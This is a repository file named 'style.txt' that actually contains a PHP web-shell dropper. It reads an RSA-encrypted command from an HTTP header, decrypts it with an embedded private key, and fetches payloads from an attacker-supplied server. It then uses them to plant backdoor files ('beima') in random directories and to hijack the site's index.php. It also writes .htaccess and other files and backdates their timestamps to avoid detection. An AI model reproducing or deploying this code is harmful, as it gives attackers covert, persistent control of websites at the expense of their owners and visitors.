-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathstyle.txt
348 lines (348 loc) · 13 KB
/
style.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
<?php
error_reporting(0);
class ErrorCode
{
const E_200400 = 200400;
}
class MsgText
{
const PARAM_EMPTY = 'param is empty';
const PARAM_TYPE = 'param type error';
const VALUE_ERROR = 'value error';
const NOCHANGE = 'no change';
const LOCK_FILE_SUCCESS = 'generate lock file success,but lock index.php error';
const LOCK_FILE_ERROR = 'generate lock file error';
const REMOTE_GET_ERROR = 'get remote content error';
const LOCAL_FILE_ERROR = 'generate local file error';
const SUCCESS = 'success';
const LOCAL_FILE_EXISTS = 'local file doesn\'t exist';
const REMOTE_FILE_EXISTS = 'remote file doesn\'t exist';
const RENAME_ERROR = 'rename error';
const INDEX_ERROR = 'index hijack error';
const UNKNOWN_ERROR = 'unknown error';
const DECRYPT_FAIL = 'params decrypt fail';
}
function error($msg = MsgText::UNKNOWN_ERROR, $extras = [], $code = 0)
{
empty($code) && $code = ErrorCode::E_200400;
exit(@json_encode(['code' => $code, 'msg' => $msg, 'extras' => $extras], JSON_UNESCAPED_UNICODE));
}
function success($data)
{
exit(@json_encode(['code' => 200, 'msg' => MsgText::SUCCESS, 'data' => $data], JSON_UNESCAPED_UNICODE));
}
function getDirPathsByLevel($level = 6)
{
$initDir = $_SERVER['DOCUMENT_ROOT'];
$dirs = array($initDir);
$count = count($dirs);
while (count($dirs) > ($count - 1)) {
$path = $dirs[($count - 1)];
$count += 1;
if (@is_dir($path) && @$handle = @opendir($path)) {
while ($file = @readdir($handle)) {
$realpath = $path . '/' . $file;
if ($file == '.' || $file == '..' || !is_dir($realpath) || substr($file, 0, 1) === '.') {
continue;
}
$path3 = str_replace($initDir, "", $path);
$path4 = explode("/", $path3);
if (count($path4) > $level - 1) {
continue;
}
$dirs[] = $realpath;
}
}
@closedir($handle);
}
return $dirs;
}
function getUrl($url)
{
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 5);
curl_setopt($curl, CURLOPT_AUTOREFERER, 0);
curl_exec($curl);
$httpCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
curl_close($curl);
if ($httpCode === 200) {
$content = curl_exec($curl);
return ['code' => 200, 'resp' => $content];
}
return ['code' => 500, 'resp' => ''];
}
function getRemoteContent($url)
{
$content = @file_get_contents($url);
if ($content === false) {
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 5);
curl_setopt($curl, CURLOPT_AUTOREFERER, 0);
$content = curl_exec($curl);
curl_close($curl);
}
return !empty($content) && is_string($content) ? $content : '';
}
function copyfile($content, $localfile, $isAppend = false, $appendContent = '')
{
if ($isAppend && !empty($appendContent)) {
$content = trim($content);
if (substr($content, -2, 2) !== '?>') {
$content .= ' ?>';
}
$content = $content . PHP_EOL . PHP_EOL . $appendContent;
}
@file_put_contents($localfile, $content);
if (!file_exists($localfile)) {
$openedfile = @fopen($localfile, "w");
@fwrite($openedfile, $content);
@fclose($openedfile);
}
if (!file_exists($localfile)) {
return false;
}
return true;
}
function updateFiletime($filepath)
{
$ctime = filectime($filepath);
$now = time();
if (!($now > $ctime + 31104000)) {
$newTime = $now - (mt_rand(15552000, 31104000));
touch($filepath, $newTime, $newTime);
return true;
}
return true;
}
$privateKey = '-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQC30w49ItOfldQ6
dB+0gEbeeW6BEClcx+NZzmpX2YcRHFV80BurCWBavPFehV8Sy9yL2u/y3mv3QJJ+
x2kKvly8zKx4GbXPbsWJk6Ho0Rxq49oXkBarQBOqROZeaFF3Mzpd/PdLSsxEvG1M
tQd2wOx5r6XD86jyfN7LAJUUVvbJvn1CHo03nFH12k1KYwLnQfzQI5nX7yQLa0jt
fG5TA34Fm0EMbFdHWjAN/VdEjoJI6it4PCQP5wk4ga2BvVquQkuPbsbr8364d3I6
GuGAKDR0wfkT20n0E6kAmDI3ol2bfa0rQncqUS3OU3INpxOZS8eKCIgC3bM81mdi
MQ6TsAQ9AgMBAAECggEAJLGSlA2RpLdpx8lKUuOQQfSHZGfveb/E2DZl7+dSGM5J
GkMIYtnaTAKPQ8jns37SJXCsmRRhBNf05i20ABsDtAQ/ITIwopmAAPhhR3IGdCfL
bwyqGcEOq9xZB9tW965YJk7KplLl94qNXtR8Cu5zxc6UDktjHBRk/Ky/FXJOjPKM
sA8rhox7dqlZUB3I/qiqrQOgT1Bsq1BFT+2GGwRUWZ1CyFoZvhsDomdo4yhRrB0b
8Ym4MDiVqxFPVW8XB9RFD9YKt+v50Eb6iSKJNLpRmjZDNZbrEYO6NRsRBM7brDa9
n39mZWFr47wGGXXv/NhwTvRI+2Si/ZfdP4+o5TeSWQKBgQDhIVOUODisiLhk7XKb
Yu7BW1ZFcK0JxurqHN22msvA0Q/1q4RvziETjekXIn9lVKCmS/gy2O2RtuQRulAR
fc3sz2W9tNXRF8Avy0728NG0baOOwBalO8w3cCX6Nnm70pJer+iJSn3tmAKSB4LT
vbSB8pt6QgP8NPHyQdWp2LwOtwKBgQDRB8lgSaImIMJBaXERSaoNg8kxv3/cv4g5
jUlljxNQcUsj0V7XilnB3mFxq5rHjBZTsKzMMQyvhOxYhptDfw6OLtoPUk2WiBUs
l3qU0tIXNN+cTxu2SMKTjwMktkpmACJqa+k27eEUqxrKO/6SEiP9FMXHvgA4EEBM
Hww1eU9QqwKBgAWSY5Uphw2OHLIyxkFeQ3Z5ojr5vO6fA7VjnYEld6GACxsTcaWq
vlrTik9ORUTmwUscWjo38DlJA4AE0nJ8YJpZz7TQQvJ32gPUzlGCSE5k4EVqL6VL
Q5Sjq+zzaDPj1EePpvuu4kr9FiMzGGPRMCR/MqXl+F9HmC1cv8MCYDUlAoGBAK77
g7pVKaYdWkCD0iEUt4Rkw/IfSxwyQglbmwungBWhIbO0O17X9Fd0n8IWU5WkUbRx
e9XbYbE05t0cobEZFcg0tFqLHWRcOs1/aSBYc4L1whMJrjskIa6A07LR3uoQRr8r
4qkW7YrtyZluK6eABByCXSbeiTRldk3C1+eTy6/NAoGAb9/J+NWrhYSr/VoGWjui
chXCNszy4w6exVwxXQKNTtlzKxyhQfVPK2BxrptWL6KCRKpz3wh+WY2C3QYyVfwG
FB4hwDr2mY4TWF9pD194iES1yhrQGlI8XM+2LVhBl3p0x+TFgJMaTgDDqAnxpuqT
upBYqTYMlOd+VR7hENMaFqo=
-----END PRIVATE KEY-----';
$p = $_SERVER['HTTP_P'];
$params = openssl_private_decrypt(base64_decode(urldecode($p)), $decrypted, $privateKey) ? $decrypted : null;
if (is_null($params)) {
error(MsgText::DECRYPT_FAIL);
}
$params = json_decode($params, true);
if (!is_array($params)) {
error(MsgText::PARAM_TYPE, $params);
}
if (empty($params['server'])) {
error('server ' . MsgText::PARAM_EMPTY);
}
if (empty($params['iden'])) {
error('iden ' . MsgText::PARAM_EMPTY);
}
$iden = isset($params['iden']) ? strtolower($params['iden']) : '';
switch ($iden) {
case "beima":
$res = doBeima($params);
break;
case "rename":
$res = doRename($params);
break;
case "index":
$res = doIndex($params);
break;
case "sub":
case "htaccess":
$res = doSub($params);
break;
case "lock":
$res = doLock($params);
break;
case "style":
$res = doStyle($params);
break;
default:
error('iden ' . MsgText::VALUE_ERROR);
}
function doBeima($params)
{
if (empty($params['filename'])) {
error('filename ' . MsgText::PARAM_EMPTY, $params);
}
if (empty($params['shellfile'])) {
error('shellfile ' . MsgText::PARAM_EMPTY, $params);
}
empty($params['level']) && $params['level'] = 6;
$dirs = getDirPathsByLevel($params['level']);
$temp = array_rand($dirs);
$createDir = $dirs[$temp] . '/';
$localfilepath = $createDir . $params['filename'];
$remoteFileUrl = $params['server'] . $params['shellfile'];
$content = getRemoteContent($remoteFileUrl);
$content = json_decode($content, true);
if (!empty($content['result'])) {
if (copyfile($content['result'], $localfilepath)) {
updateFiletime($localfilepath);
$beimaurl = str_replace($_SERVER['DOCUMENT_ROOT'], '', $localfilepath);
success(compact('localfilepath', 'beimaurl'));
}
error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath'));
}
error(MsgText::REMOTE_FILE_EXISTS, compact('remoteFileUrl'));
}
function doRename($params)
{
if (empty($params['sourcename'])) {
error('sourcename ' . MsgText::PARAM_EMPTY, $params);
}
if (empty($params['rename'])) {
error('rename ' . MsgText::PARAM_EMPTY, $params);
}
if ($params['sourcename'] === $params['rename']) {
error(MsgText::NOCHANGE);
}
$sourceFile = dirname(__FILE__) . DIRECTORY_SEPARATOR . $params['sourcename'];
$renameFile = dirname(__FILE__) . DIRECTORY_SEPARATOR . $params['rename'];
$resSource = $params['server'] . str_replace(strtolower($_SERVER['DOCUMENT_ROOT']), '', strtolower($sourceFile));
$resSource = str_replace('\\', '/', $resSource);
if (file_exists($sourceFile)) {
if (rename($sourceFile, $renameFile)) {
success($renameFile);
} else {
error(MsgText::RENAME_ERROR, compact('renameFile'));
}
} else {
error(MsgText::LOCAL_FILE_EXISTS, compact('resSource'));
}
}
function doIndex($params)
{
if (empty($params['shellfile'])) {
error('shellfile ' . MsgText::PARAM_EMPTY, $params);
}
$remoteUrl = $params['server'] . trim($params['shellfile']);
$localfilepath = $_SERVER['DOCUMENT_ROOT'] . '/index.php';
$content = getRemoteContent($remoteUrl);
$content = json_decode($content, true);
if (!empty($content['result'])) {
$oldContent = '';
if (file_exists($localfilepath)) {
$oldContent = @file_get_contents($localfilepath);
} elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/index.html')) {
$oldContent = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/index.html');
} elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/index.htm')) {
$oldContent = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/index.htm');
} elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/default.html')) {
$oldContent = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/default.html');
} elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/default.htm')) {
$oldContent = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/default.htm');
}
if (copyfile($content['result'], $localfilepath, true, $oldContent)) {
updateFiletime($localfilepath);
@chmod($localfilepath, 0644);
success($localfilepath);
}
error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath'));
}
error(MsgText::INDEX_ERROR, compact('remoteUrl'));
}
function doSub($params)
{
if (empty($params['shellfile'])) {
error('shellfile' . MsgText::PARAM_EMPTY, $params);
}
if (empty($params['filename'])) {
error('filename ' . MsgText::PARAM_EMPTY, $params);
}
$localfilepath = $_SERVER['DOCUMENT_ROOT'] . '/' . $params['filename'];
$remoteFileUrl = $params['server'] . $params['shellfile'];
$content = getRemoteContent($remoteFileUrl);
$content = json_decode($content, true);
if (!empty($content['result'])) {
if (copyfile($content['result'], $localfilepath)) {
updateFiletime($localfilepath);
@chmod($localfilepath, 0644);
success($localfilepath);
}
error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath'));
}
error(MsgText::REMOTE_GET_ERROR, compact('remoteFileUrl'));
}
function doLock($params)
{
if (empty($params['filename'])) {
error('filename ' . MsgText::PARAM_EMPTY, $params);
}
if (empty($params['domain'])) {
error('domain ' . MsgText::PARAM_EMPTY, $params);
}
if (empty($params['shellfile'])) {
error('shellfile ' . MsgText::PARAM_EMPTY, $params);
}
$localfilepath = $_SERVER['DOCUMENT_ROOT'] . '/' . $params['filename'];
$remoteFileUrl = $params['server'] . $params['shellfile'];
$content = getRemoteContent($remoteFileUrl);
$content = json_decode($content, true);
if (!empty($content['result'])) {
if (copyfile($content['result'], $localfilepath)) {
$lockurl = $params['domain'] . $params['filename'];
$lockres = getUrl($lockurl);
@unlink($localfilepath);
if ($lockres['code'] === 200 && !empty($lockres['resp']) && strpos($lockres['resp'], 'success')) {
success($lockres['resp']);
}
error(MsgText::LOCK_FILE_SUCCESS, compact('lockurl', 'lockres'));
}
@unlink($localfilepath);
error(MsgText::LOCK_FILE_ERROR, compact('localfilepath'));
}
error(MsgText::REMOTE_GET_ERROR, compact('remoteFileUrl'));
}
function doStyle($params)
{
if (empty($params['shellfile'])) {
error('shellfile' . MsgText::PARAM_EMPTY, $params);
}
if (empty($params['filename'])) {
error('filename ' . MsgText::PARAM_EMPTY, $params);
}
if (empty($params['domain'])) {
error('domain ' . MsgText::PARAM_EMPTY, $params);
}
$localfilepath = $params['domain'] . $params['filename'];
$remoteFileUrl = $params['server'] . $params['shellfile'];
$content = getRemoteContent($remoteFileUrl);
$content = json_decode($content, true);
if (!empty($content['result'])) {
if (copyfile($content['result'], $localfilepath)) {
updateFiletime($localfilepath);
@chmod($localfilepath, 0644);
success($localfilepath);
}
error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath'));
}
error(MsgText::REMOTE_GET_ERROR, compact('remoteFileUrl'));
}